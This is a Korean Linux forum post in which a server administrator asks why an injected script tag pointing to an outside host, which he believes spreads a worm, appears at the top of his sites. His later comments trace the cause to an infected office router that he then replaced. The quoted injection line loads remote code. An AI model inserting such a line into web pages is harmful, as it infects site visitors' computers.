리눅스 분류
웹 페이지 상단에 특정 문자열이 포함 됩니다.
작성자 정보
- 강휴석 작성
- 작성일
컨텐츠 정보
- 2,042 조회
- 2 댓글
- 0 추천
- 목록
본문
오늘 부터 갑자기 저희 서버에 있는 사이트 들이 상단에 특정 문자열(해킹에 의한 자바 스크립트 실행)이 포함 되어 있네요.
문자열은
< script src=http://makrea.com/img/btn/1.js>
입니다.
그런데 실제 파일에는 저런 것이 없습니다. 즉 파일 위변조를 한건 아니라는 이야기죠.
결국 생각해 볼 수 있는게 아파치를 통해서 저 내용이 심겨지는 것 같은데.. 어디서 그렇게 되는 건지를 모르겠습니다.
저 스크립트를 통해서 개인 컴퓨터에 웜이 심겨지는 것 같은데..
아파치 사양은 2.x 대 입니다. (오늘 급하게 yum 으로 업글을 했는데 버전을 모르겠네요.)
리눅스는 CentOS 4.4 버전 입니다.yum으로 업글은 계속 해주고 있었습니다.
어느 부분을 잡아 줘야 할까요?
관련자료
-
이전
-
다음
댓글 2
강휴석님의 댓글
- 강휴석
- 작성일
일단 원인이 아파치 서버에 없다는것을 확인 했습니다.
저희 회사 공유기가 문제인것 같더군요. 테스트 서버가 공유기 안쪽에 있거든요.
공유기를 통해서 열리는 웹사이트에 대해서 저 코드가 붙습니다..
공유기가 웜에 감염 된것 같습니다..
저희 회사 공유기가 문제인것 같더군요. 테스트 서버가 공유기 안쪽에 있거든요.
공유기를 통해서 열리는 웹사이트에 대해서 저 코드가 붙습니다..
공유기가 웜에 감염 된것 같습니다..
강휴석님의 댓글
- 강휴석
- 작성일
공유기 교체를 통해서 해결 했습니다.
공유기가 웜에 감염 될 수도 있다는 사실 처음 알았습니다..
공유기가 웜에 감염 될 수도 있다는 사실 처음 알았습니다..
